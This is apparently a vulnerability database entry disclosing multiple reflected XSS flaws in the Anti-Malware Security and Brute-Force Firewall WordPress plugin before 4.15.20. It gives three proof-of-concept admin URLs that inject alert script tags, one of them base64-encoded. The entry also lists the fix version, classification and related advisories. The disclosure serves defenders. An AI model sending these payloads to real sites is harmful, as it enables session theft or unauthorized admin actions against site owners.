Anti-Malware & Brute-Force Security by ELI < 4.15.20 – Multiple Reflected XSS | Plugin Vulnerabilities

Description

The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a Multiple Reflected XSS security vulnerability.

Proof of Concept

http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_msg=xsstest<script>alert(1)</script>

http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&scan_what=1&scan_type=xsstest<script>alert(1)</script>

http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_fixing=2&GOTMLS_fix[]=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

Affects Plugins

Fixed in 4.15.20

References

URL

https://web.archive.org/web/20160314072650/https://software-talk.org/blog/2015/05/reflected-xss-vulnerability-gotmls/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

Tim Coen

Verified

No

WPVDB ID

8eb5ad4c-e556-4872-82ee-9e8a9f25e7d5

Timeline

Publicly Published

2015-05-15 (about 9 years ago)

Added

2015-05-15 (about 9 years ago)

Last Updated

2019-10-21 (about 4 years ago)

Other

Published

Title

Published

2018-01-12

Title

Booking Calendar <= 2.1.7 - Authenticated Stored XSS & CSRF

Published

2021-12-20

Title

Event Calendar < 1.1.51 - Reflected Cross-Site Scripting

Published

2024-05-03

Title

BuddyPress < 12.4.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2023-04-06

Title

Maps Widget for Google Maps < 4.25 - Admin+ Stored XSS

Published

2023-04-19

Title

Continuous announcement scroller <= 13.0 - Admin+ Stored XSS